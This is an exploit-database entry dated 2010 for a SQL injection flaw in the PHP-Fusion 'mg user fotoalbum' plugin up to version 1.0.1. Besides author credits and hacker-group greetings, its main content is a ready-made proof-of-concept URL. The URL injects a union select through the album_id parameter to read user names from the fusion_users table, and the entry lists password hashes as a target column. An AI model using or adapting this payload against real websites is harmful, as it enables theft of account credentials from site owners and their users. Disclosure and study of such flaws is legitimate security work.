PHP-Fusion MG User-Fotoalbum SQL Injection Vulnerability

2010-10-11T00:00:00
ID 1337DAY-ID-14400
Type zdt
Reporter Easy Laster
Modified 2010-10-11T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ========================================================
PHP-Fusion MG User-Fotoalbum SQL Injection Vulnerability
========================================================

----------------------------Information------------------------------------------------
+Name : PHP-Fusion mg user fotoalbum 1.0.1 <=  SQL injection Vulnerability Proof of Concept
+Autor : Easy Laster
+Date   : 10.10.2010
+Script  : PHP-Fusion mg user fotoalbum 1.0.1
+Download : http://phpfusion.marcusg.de/downloads.php?page_id=67
+Price : free
+Language : PHP
+Discovered by Easy Laster
+Security Group 4004-Security-Project
+Greetz to Team-Internet ,Underground Agents and free-hack.com
+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
Kiba,-tmh-,Dr.ChAoS,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
N00bor,Ic3Drag0n,novaca!ne,n3w7u,Maverick010101,s0red,c1ox,enco,
  
+Proof of Concept
+Table : fusion_users
+columns : user_password, user_name
+Proof of Concept : http://www.site.com/infusions/mg_user_fotoalbum_panel/mg_user_fot
oalbum.php?album_user_id=251&album_id=%27+union+select+1,2,3,4,user_name,6,7,8,9,10,11
+from+fusion_users+where+user_id=1--+
----------------------------------------------------------------------------------------



#  0day.today [2018-02-19]  #